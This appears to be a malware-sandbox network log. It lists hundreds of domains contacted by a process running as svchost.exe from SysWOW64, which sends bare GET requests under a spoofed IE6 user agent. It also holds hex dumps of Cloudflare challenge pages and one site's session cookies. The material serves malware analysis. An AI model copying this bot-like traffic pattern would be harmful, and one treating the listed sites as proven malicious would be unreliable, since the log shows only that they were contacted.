                                                                                                                                                                                                                                                        Oct 9, 2023 15:52:36.911983013 CEST1.1.1.1192.168.2.30xdd36No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        • orlyhotel.com
                                                                                                                                                                                                                                                        • hyab.se
                                                                                                                                                                                                                                                        • techtrans.de
                                                                                                                                                                                                                                                        • ldh.la.gov
                                                                                                                                                                                                                                                        • nts-web.net
                                                                                                                                                                                                                                                        • diamir.de
                                                                                                                                                                                                                                                        • pleszew.policja.gov.pl
                                                                                                                                                                                                                                                        • www.diamir.de
                                                                                                                                                                                                                                                        • clinicasanluis.com.co
                                                                                                                                                                                                                                                        • www.clinicasanluis.com.co
                                                                                                                                                                                                                                                        • www.muhr-soehne.de
                                                                                                                                                                                                                                                        • www.ftchat.com
                                                                                                                                                                                                                                                        • www.jenco.co.uk
                                                                                                                                                                                                                                                        • www.dgmna.com
                                                                                                                                                                                                                                                        • www.quadlock.com
                                                                                                                                                                                                                                                        • www.pdqhomes.com
                                                                                                                                                                                                                                                        • www.pr-park.com
                                                                                                                                                                                                                                                        • www.olras.com
                                                                                                                                                                                                                                                        • www.alteor.cl
                                                                                                                                                                                                                                                        • www.baijaku.com
                                                                                                                                                                                                                                                        • www.valdal.com
                                                                                                                                                                                                                                                        • www.depalo.com
                                                                                                                                                                                                                                                        • www.tvtools.fi
                                                                                                                                                                                                                                                        • www.elpro.si
                                                                                                                                                                                                                                                        • www.petsfan.com
                                                                                                                                                                                                                                                        • www.otena.com
                                                                                                                                                                                                                                                        • www.credo.edu.pl
                                                                                                                                                                                                                                                        • www.wkhk.net
                                                                                                                                                                                                                                                        • www.abart.pl
                                                                                                                                                                                                                                                        • www.evcpa.com
                                                                                                                                                                                                                                                        • www.hummer.hu
                                                                                                                                                                                                                                                        • www.ora.ecnet.jp
                                                                                                                                                                                                                                                        • www.xaicom.es
                                                                                                                                                                                                                                                        • www.transsib.com
                                                                                                                                                                                                                                                        • www.iamdirt.com
                                                                                                                                                                                                                                                        • www.waldi.pl
                                                                                                                                                                                                                                                        • www.mqs.com.br
                                                                                                                                                                                                                                                        • www.abdg.com
                                                                                                                                                                                                                                                        • www.gpthink.com
                                                                                                                                                                                                                                                        • www.wifi4all.nl
                                                                                                                                                                                                                                                        • www.aevga.com
                                                                                                                                                                                                                                                        • www.naoi-a.com
                                                                                                                                                                                                                                                        • www.synetik.net
                                                                                                                                                                                                                                                        • www.fcwcvt.org
                                                                                                                                                                                                                                                        • www.stnic.co.uk
                                                                                                                                                                                                                                                        • www.holleman.us
                                                                                                                                                                                                                                                        • www.kernsafe.com
                                                                                                                                                                                                                                                        • www.jacomfg.com
                                                                                                                                                                                                                                                        • www.yocinc.org
                                                                                                                                                                                                                                                        • www.snugpak.com
                                                                                                                                                                                                                                                        • www.netcr.com
                                                                                                                                                                                                                                                        • www.jchysk.com
                                                                                                                                                                                                                                                        • www.photo4b.com
                                                                                                                                                                                                                                                        • www.nelipak.nl
                                                                                                                                                                                                                                                        • www.mobilnic.net
                                                                                                                                                                                                                                                        • www.ex-olive.com
                                                                                                                                                                                                                                                        • www.vitaindu.com
                                                                                                                                                                                                                                                        • www.lrsuk.com
                                                                                                                                                                                                                                                        • www.crcsi.org
                                                                                                                                                                                                                                                        • www.dayvo.com
                                                                                                                                                                                                                                                        • www.tyrns.com
                                                                                                                                                                                                                                                        • www.valselit.com
                                                                                                                                                                                                                                                        • www.edimart.hu
                                                                                                                                                                                                                                                        • www.ora-ito.com
                                                                                                                                                                                                                                                        • www.stajum.com
                                                                                                                                                                                                                                                        • www.pcgrate.com
                                                                                                                                                                                                                                                        • www.2print.com
                                                                                                                                                                                                                                                        • www.spanesi.com
                                                                                                                                                                                                                                                        • www.x0c.com
                                                                                                                                                                                                                                                        • www.pupi.cz
                                                                                                                                                                                                                                                        • www.fink.com
                                                                                                                                                                                                                                                        • www.tc17.com
                                                                                                                                                                                                                                                        • www.nqks.com
                                                                                                                                                                                                                                                        • www.myropcb.com
                                                                                                                                                                                                                                                        • www.yoruksut.com
                                                                                                                                                                                                                                                        • www.medius.si
                                                                                                                                                                                                                                                        • www.ka-mo-me.com
                                                                                                                                                                                                                                                        • www.item-pr.com
                                                                                                                                                                                                                                                        • www.com-sit.com
                                                                                                                                                                                                                                                        • www.nunomira.com
                                                                                                                                                                                                                                                        • www.vexcom.com
                                                                                                                                                                                                                                                        • www.sjbs.org
                                                                                                                                                                                                                                                        • www.maktraxx.com
                                                                                                                                                                                                                                                        • www.cel-cpa.com
                                                                                                                                                                                                                                                        • www.fe-bauer.de
                                                                                                                                                                                                                                                        • www.rs-ag.com
                                                                                                                                                                                                                                                        • www.railbook.net
                                                                                                                                                                                                                                                        • www.vazir.se
                                                                                                                                                                                                                                                        • www.t-tre.com
                                                                                                                                                                                                                                                        • www.cokocoko.com
                                                                                                                                                                                                                                                        • www.speelhal.net
                                                                                                                                                                                                                                                        • www.findbc.com
                                                                                                                                                                                                                                                        • www.c9dd.com
                                                                                                                                                                                                                                                        • www.domon.com
                                                                                                                                                                                                                                                        • www.pwd.org
                                                                                                                                                                                                                                                        • www.fnsds.org
                                                                                                                                                                                                                                                        • www.pohlfood.com
                                                                                                                                                                                                                                                        • www.11tochi.net
                                                                                                                                                                                                                                                        • adeesa.net
                                                                                                                                                                                                                                                        • absblast.com
                                                                                                                                                                                                                                                        • uhsa.edu.ag
                                                                                                                                                                                                                                                        • sokuwan.net
                                                                                                                                                                                                                                                        • vonparis.com
                                                                                                                                                                                                                                                        • mijash3.com
                                                                                                                                                                                                                                                        • deckoviny.cz
                                                                                                                                                                                                                                                        • icd-host.com
                                                                                                                                                                                                                                                        • mackusick.com
                                                                                                                                                                                                                                                        • zupraha.cz
                                                                                                                                                                                                                                                        • jsaps.com
                                                                                                                                                                                                                                                        • daytonir.com
                                                                                                                                                                                                                                                        • redgiga.com
                                                                                                                                                                                                                                                        • wvs-net.de
                                                                                                                                                                                                                                                        • wantapc.net
                                                                                                                                                                                                                                                        • ssm.ch
                                                                                                                                                                                                                                                        • workplus.hu
                                                                                                                                                                                                                                                        • komie.com
                                                                                                                                                                                                                                                        • ifesnet.com
                                                                                                                                                                                                                                                        • sigtoa.com
                                                                                                                                                                                                                                                        • www.pb-games.com
                                                                                                                                                                                                                                                        • ccssinc.com
                                                                                                                                                                                                                                                        • k-nikko.com
                                                                                                                                                                                                                                                        • any-s.net
                                                                                                                                                                                                                                                        • onzcda.com
                                                                                                                                                                                                                                                        • rtcasey.com
                                                                                                                                                                                                                                                        • ikulani.com
                                                                                                                                                                                                                                                        • acraloc.com
                                                                                                                                                                                                                                                        • cbaben.com
                                                                                                                                                                                                                                                        • themark.org
                                                                                                                                                                                                                                                        • stopllc.com
                                                                                                                                                                                                                                                        • from30ty.com
                                                                                                                                                                                                                                                        • sinwal.com
                                                                                                                                                                                                                                                        • cutchie.com
                                                                                                                                                                                                                                                        • bidroll.com
                                                                                                                                                                                                                                                        • reproar.com
                                                                                                                                                                                                                                                        • calvinly.com
                                                                                                                                                                                                                                                        • metaforacom.com
                                                                                                                                                                                                                                                        • insia.com
                                                                                                                                                                                                                                                        • coxkitchensandbaths.com
                                                                                                                                                                                                                                                        • univi.it
                                                                                                                                                                                                                                                        • flamingorecordings.com
                                                                                                                                                                                                                                                        • dhh.la.gov
                                                                                                                                                                                                                                                        • portoccd.org
                                                                                                                                                                                                                                                        • shiner.com
                                                                                                                                                                                                                                                        • vdoherty.com
                                                                                                                                                                                                                                                        • fifa-ews.com
                                                                                                                                                                                                                                                        • canasil.com
                                                                                                                                                                                                                                                        • magicomm.co.uk
                                                                                                                                                                                                                                                        • tbvlugus.nl
                                                                                                                                                                                                                                                        • shittas.com
                                                                                                                                                                                                                                                        • ramkome.com
                                                                                                                                                                                                                                                        • impexnc.com
                                                                                                                                                                                                                                                        • scip.org.uk
                                                                                                                                                                                                                                                        • hes.pt
                                                                                                                                                                                                                                                        • rappich.de
                                                                                                                                                                                                                                                        • orbitgas.com
                                                                                                                                                                                                                                                        • shesfit.com
                                                                                                                                                                                                                                                        • kumaden.com
                                                                                                                                                                                                                                                        • doggybag.org
                                                                                                                                                                                                                                                        • kevyt.net
                                                                                                                                                                                                                                                        • strazynski.pl
                                                                                                                                                                                                                                                        • bggs.com
                                                                                                                                                                                                                                                        • bount.com.tw
                                                                                                                                                                                                                                                        • mackusick.de
                                                                                                                                                                                                                                                        • sjbmw.com
                                                                                                                                                                                                                                                        • agulatex.com
                                                                                                                                                                                                                                                        • pers.com
                                                                                                                                                                                                                                                        • yoruksut.com
                                                                                                                                                                                                                                                        • araax.com
                                                                                                                                                                                                                                                        • karmy.com.pl
                                                                                                                                                                                                                                                        • www.sclover3.com
                                                                                                                                                                                                                                                        • msl-lock.com
                                                                                                                                                                                                                                                        • indonesiamedia.com
                                                                                                                                                                                                                                                        • xult.org
                                                                                                                                                                                                                                                        • dbnet.at
                                                                                                                                                                                                                                                        • s5w.com
                                                                                                                                                                                                                                                        • a-domani.com
                                                                                                                                                                                                                                                        • yhsll.com
                                                                                                                                                                                                                                                        • pccj.net
                                                                                                                                                                                                                                                        • tozzhin.com
                                                                                                                                                                                                                                                        • kavram.com
                                                                                                                                                                                                                                                        • karila.fr
                                                                                                                                                                                                                                                        • mjrcpas.com
                                                                                                                                                                                                                                                        • nrsi.com
                                                                                                                                                                                                                                                        • sgk.home.pl
                                                                                                                                                                                                                                                        • ntc.edu.au
                                                                                                                                                                                                                                                        • gbmfg.com
                                                                                                                                                                                                                                                        • okashimo.com
                                                                                                                                                                                                                                                        • noblesse.be
                                                                                                                                                                                                                                                        • aiolos-sa.gr
                                                                                                                                                                                                                                                        • web-york.com
                                                                                                                                                                                                                                                        • hbfuels.com
                                                                                                                                                                                                                                                        • sidepath.com
                                                                                                                                                                                                                                                        • wanoa.com
                                                                                                                                                                                                                                                        • ruzee.com
                                                                                                                                                                                                                                                        • ascc.org.au
                                                                                                                                                                                                                                                        • lyto.net
                                                                                                                                                                                                                                                        • cvswl.org
                                                                                                                                                                                                                                                        • semuk.com
                                                                                                                                                                                                                                                        • 603888.com
                                                                                                                                                                                                                                                        • jnf.at
                                                                                                                                                                                                                                                        • e-kami.net
                                                                                                                                                                                                                                                        • btsi.com.ph
                                                                                                                                                                                                                                                        • envogen.com
                                                                                                                                                                                                                                                        • enguita.net
                                                                                                                                                                                                                                                        • gydrozo.ru
                                                                                                                                                                                                                                                        • anduran.com
                                                                                                                                                                                                                                                        • t-trust.jp
                                                                                                                                                                                                                                                        • umcor.am
                                                                                                                                                                                                                                                        • 78san.com
                                                                                                                                                                                                                                                        • duiops.net
                                                                                                                                                                                                                                                        • fortknox.bm
                                                                                                                                                                                                                                                        • burstner.ru
                                                                                                                                                                                                                                                        • host.do
                                                                                                                                                                                                                                                        • tcpoa.com
                                                                                                                                                                                                                                                        • valselit.com
                                                                                                                                                                                                                                                        • websy.com
                                                                                                                                                                                                                                                        • akdeniz.nl
                                                                                                                                                                                                                                                        • dzm.cz
                                                                                                                                                                                                                                                        • epc.com.au
                                                                                                                                                                                                                                                        • nettlinx.org
                                                                                                                                                                                                                                                        • com-edit.fr
                                                                                                                                                                                                                                                        • hubbikes.com
                                                                                                                                                                                                                                                        • wnit.org
                                                                                                                                                                                                                                                        • gcss.com
                                                                                                                                                                                                                                                        • popbook.com
                                                                                                                                                                                                                                                        • pellys.co.uk
                                                                                                                                                                                                                                                        • skypearl.com
                                                                                                                                                                                                                                                        • missnue.com
                                                                                                                                                                                                                                                        • ncn.de
                                                                                                                                                                                                                                                        • dog-jog.net
                                                                                                                                                                                                                                                        • ludomemo.com
                                                                                                                                                                                                                                                        • gbp-jp.com
                                                                                                                                                                                                                                                        • vivastay.com
                                                                                                                                                                                                                                                        • cyclad.pl
                                                                                                                                                                                                                                                        • captlfix.com
                                                                                                                                                                                                                                                        • holp-ai.com
                                                                                                                                                                                                                                                        • nettle.pl
                                                                                                                                                                                                                                                        • shteeble.com
                                                                                                                                                                                                                                                        • skgm.ru
                                                                                                                                                                                                                                                        • oh28ya.com
                                                                                                                                                                                                                                                        • hchc.org
                                                                                                                                                                                                                                                        • pertex.com
                                                                                                                                                                                                                                                        • simetar.com
                                                                                                                                                                                                                                                        • riwn.org
                                                                                                                                                                                                                                                        • ludea.cz
                                                                                                                                                                                                                                                        • jabian.com
                                                                                                                                                                                                                                                        • esmoke.net
                                                                                                                                                                                                                                                        • shanks.co.uk
                                                                                                                                                                                                                                                        • wolffkran.de
                                                                                                                                                                                                                                                        • willsub.com
                                                                                                                                                                                                                                                        • nels.co.uk
                                                                                                                                                                                                                                                        • dayvo.com
                                                                                                                                                                                                                                                        • yasuma.com
                                                                                                                                                                                                                                                        • likangds.com
                                                                                                                                                                                                                                                        • angework.com
                                                                                                                                                                                                                                                        • siongann.com
                                                                                                                                                                                                                                                        • www.koz1.net
                                                                                                                                                                                                                                                        • banvari.com
                                                                                                                                                                                                                                                        • mikihan.com
                                                                                                                                                                                                                                                        • kamptal.at
                                                                                                                                                                                                                                                        • alexpope.biz
                                                                                                                                                                                                                                                        • bd-style.com
                                                                                                                                                                                                                                                        • bosado.com
                                                                                                                                                                                                                                                        • plaske.ua
                                                                                                                                                                                                                                                        • htsmx.net
                                                                                                                                                                                                                                                        • beafin.com
                                                                                                                                                                                                                                                        • muhr-soehne.de
                                                                                                                                                                                                                                                        • nlcv.bas.bg
                                                                                                                                                                                                                                                        • atb-lit.com
                                                                                                                                                                                                                                                        • floopis.com
                                                                                                                                                                                                                                                        • amic.at
                                                                                                                                                                                                                                                        • adventist.ro
                                                                                                                                                                                                                                                        • sledsport.ru
                                                                                                                                                                                                                                                        • cbras.com
                                                                                                                                                                                                                                                        • at-shun.com
                                                                                                                                                                                                                                                        • geecl.com
                                                                                                                                                                                                                                                        • midap.com
                                                                                                                                                                                                                                                        • zemarmot.net
                                                                                                                                                                                                                                                        • johnlyon.org
                                                                                                                                                                                                                                                        • kewlmail.com
                                                                                                                                                                                                                                                        • roewer.de
                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        0192.168.2.349973172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:54 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: orlyhotel.com


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        1192.168.2.350005104.21.52.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:50:54 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC0INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:50:55 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Content-Length: 5702
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                        Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                        Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        cf-mitigated: challenge
                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vubXqouxuuM3O6xhO0O4DgLAEfJETBTb3UCiJvmi3BQ9EykJD6dLZnYn9wlb5d1L8RlsKlDHgyxAd%2B9migonKMHyAsITT9qZfofD%2FfHMNwXFq0%2BYuI8%2BjS16"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 81371869dca72b4d-LAX
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compa
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC1INData Raw: 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 33 35 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c
                                                                                                                                                                                                                                                        Data Ascii: tible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"><meta http-equiv="refresh" content="35"></head><body cl
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC3INData Raw: 78 2d 51 7a 72 47 44 51 31 61 47 7a 48 7a 6b 33 46 2d 4b 47 77 74 64 72 48 6a 66 7a 71 36 5f 35 62 7a 67 5f 71 35 4c 35 59 6e 53 4d 6b 77 48 49 6c 33 62 51 38 44 45 45 64 5f 79 65 69 42 7a 52 33 37 34 36 45 6b 34 4b 55 6d 67 62 58 73 64 62 76 74 4a 56 35 42 76 49 4b 72 31 5a 64 66 30 49 73 39 61 62 64 56 69 74 68 76 59 46 31 48 50 5f 4c 44 39 30 7a 46 6f 38 75 31 73 4e 73 56 64 77 50 38 34 73 2d 64 59 6e 65 5a 59 64 65 5a 77 4d 79 6a 39 58 38 42 57 6c 51 5f 35 67 55 6e 46 47 56 44 62 31 5a 46 44 36 65 74 6f 32 38 38 30 66 4e 79 4f 55 70 34 6b 42 64 5f 70 62 49 34 68 46 63 6b 39 46 76 6b 61 70 6c 63 6a 70 7a 73 6a 65 48 76 48 71 68 4f 34 38 6e 51 48 6d 32 63 45 64 6b 67 61 48 30 4a 55 50 70 48 52 2d 35 49 64 78 69 65 2d 61 34 6f 52 46 4e 6c 71 49 63 74 43
                                                                                                                                                                                                                                                        Data Ascii: x-QzrGDQ1aGzHzk3F-KGwtdrHjfzq6_5bzg_q5L5YnSMkwHIl3bQ8DEEd_yeiBzR3746Ek4KUmgbXsdbvtJV5BvIKr1Zdf0Is9abdVithvYF1HP_LD90zFo8u1sNsVdwP84s-dYneZYdeZwMyj9X8BWlQ_5gUnFGVDb1ZFD6eto2880fNyOUp4kBd_pbI4hFck9FvkaplcjpzsjeHvHqhO48nQHm2cEdkgaH0JUPpHR-5Idxie-a4oRFNlqIctC
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC4INData Raw: 4c 59 46 39 43 5a 76 54 37 45 75 54 50 55 51 52 76 69 6c 47 6e 4d 77 4b 59 37 67 4f 30 49 2d 62 56 33 4d 6b 5a 6a 47 7a 62 59 31 4a 44 45 4b 64 4d 4d 41 35 65 63 4f 2d 36 7a 65 52 6c 48 51 65 4f 50 68 67 4d 49 62 66 63 73 64 49 73 77 53 39 36 61 59 56 6a 46 68 45 48 73 66 58 4e 5f 5a 48 33 6b 63 46 41 63 77 32 71 48 30 41 66 5a 2d 6b 30 46 36 70 76 4e 71 4c 7a 6e 4b 72 76 44 77 6c 31 4a 6b 62 71 68 68 62 68 71 47 5f 78 38 79 2d 6c 52 4b 66 66 72 57 48 52 6f 6e 50 6d 5f 4c 6a 34 75 61 4b 66 49 39 46 61 5f 6f 35 74 47 4f 42 42 43 41 45 43 62 4a 65 6f 43 71 4d 70 6d 63 4e 6c 4c 35 57 5f 4b 32 31 57 62 51 51 62 64 4a 38 73 38 55 31 45 63 6c 4c 41 42 43 4f 75 79 6b 61 74 2d 4c 77 39 77 36 34 51 62 34 53 39 42 36 61 75 61 42 7a 5f 69 38 52 7a 63 4f 50 6e 59 70
                                                                                                                                                                                                                                                        Data Ascii: LYF9CZvT7EuTPUQRvilGnMwKY7gO0I-bV3MkZjGzbY1JDEKdMMA5ecO-6zeRlHQeOPhgMIbfcsdIswS96aYVjFhEHsfXN_ZH3kcFAcw2qH0AfZ-k0F6pvNqLznKrvDwl1JkbqhhbhqG_x8y-lRKffrWHRonPm_Lj4uaKfI9Fa_o5tGOBBCAECbJeoCqMpmcNlL5W_K21WbQQbdJ8s8U1EclLABCOuykat-Lw9w64Qb4S9B6auaBz_i8RzcOPnYp
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC5INData Raw: 69 70 70 76 62 67 79 51 6c 33 50 37 43 72 52 47 6f 38 51 78 59 31 47 67 63 43 38 68 38 33 2b 79 65 48 7a 7a 43 37 38 74 31 6a 2b 30 77 4d 79 36 4f 6a 35 46 45 53 68 4f 34 5a 2b 50 50 4c 53 39 47 58 59 41 57 58 74 48 47 50 34 5a 39 41 57 78 73 35 70 6c 6d 36 75 4d 70 38 61 6b 64 46 35 78 31 70 48 68 59 69 31 46 45 70 2f 52 4f 55 71 37 32 5a 76 31 6e 71 36 6e 47 33 52 61 38 70 5a 38 69 53 6d 50 32 4b 66 45 77 49 50 44 5a 2f 49 36 59 67 75 44 75 53 58 37 32 68 39 56 4d 69 37 64 74 53 79 55 65 57 4a 6b 30 67 69 52 68 4b 34 33 31 2b 4d 79 7a 78 54 43 79 45 44 6a 70 47 6f 69 6c 73 58 78 6c 6d 47 4b 49 56 54 52 61 66 53 52 61 35 6e 59 62 35 2b 44 6e 77 55 41 78 30 48 6f 3d 27 2c 74 3a 20 27 4d 54 59 35 4e 6a 67 31 4f 54 51 31 4e 53 34 77 4d 54 55 77 4d 44 41 3d
                                                                                                                                                                                                                                                        Data Ascii: ippvbgyQl3P7CrRGo8QxY1GgcC8h83+yeHzzC78t1j+0wMy6Oj5FEShO4Z+PPLS9GXYAWXtHGP4Z9AWxs5plm6uMp8akdF5x1pHhYi1FEp/ROUq72Zv1nq6nG3Ra8pZ8iSmP2KfEwIPDZ/I6YguDuSX72h9VMi7dtSyUeWJk0giRhK431+MyzxTCyEDjpGoilsXxlmGKIVTRafSRa5nYb5+DnwUAx0Ho=',t: 'MTY5Njg1OTQ1NS4wMTUwMDA=
                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC7INData Raw: 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 7d 28 29 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                        Data Ascii: ame('head')[0].appendChild(cpo);}());</script></body></html>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        10192.168.2.350212104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:51:02 UTC2603OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.clinicasanluis.com.co
                                                                                                                                                                                                                                                        2023-10-09 13:51:05 UTC2603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:51:05 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        x-powered-by: PHP/8.1.23
                                                                                                                                                                                                                                                        Cache-Control: no-cache, private
                                                                                                                                                                                                                                                        strict-transport-security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                        set-cookie: XSRF-TOKEN=eyJpdiI6IlFhOXYrNWUzd0cra0dTNHhYenlocXc9PSIsInZhbHVlIjoic1FUNG9weUZkMGZyd2lPVER5ZFhzQ0kybXRaNmFSR2dxa0NraGx0VEJmem5CVWF4YU1DSmtoTy9xbDU1eTU0OXlTak1rTXJaeWdmOGRva0RhYWNCTzR3TzVES25RUXdteFdxTVlMRk4yR2F6aEZqYmt5bmtlV2s1L3RqUDB5SDMiLCJtYWMiOiJjZDlkMjQ3NzNjMDkzN2RjNjdjNTQ1MjY4NDQxNTMzZTk0YWI0OWM5MmI3ZmQzOWYyMWI3NDMyM2I0ZjQyNWI0IiwidGFnIjoiIn0%3D; expires=Mon, 09-Oct-2023 15:51:05 GMT; Max-Age=7200; path=/; secure
                                                                                                                                                                                                                                                        set-cookie: clinicasanluis_session=eyJpdiI6Ik0vVElueTIrUUpaWGRZVSsxdGtvL0E9PSIsInZhbHVlIjoiMTlyckZxbHhmTTdpUVpwaWE2am5rYU1oVFJQQVlySnBCYVBiTnBHM1pVUWltQzJZcG1vNmdDRmpMR2FJUU1pOHdPYkpncjZRU3lidVVjT1dqZlM3RDZOUDZycWhDQUIvSzBsTFlGOHFJVExvZWllUUZ5YjErRG1nK0ttbUM5VXMiLCJtYWMiOiJkZDMxOWIyYmU5NzQ0NzE3MWEwNWNjNWZlNDdlYzBjYmI4YTdjZDM4Njg3OWI4MDQ0Y2JlYjhjYWZjNmNmNjc5IiwidGFnIjoiIn0%3D; expires=Mon, 09-Oct-2023 15:51:05 GMT; Max-Age=7200; path=/; httponly; secure
                                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
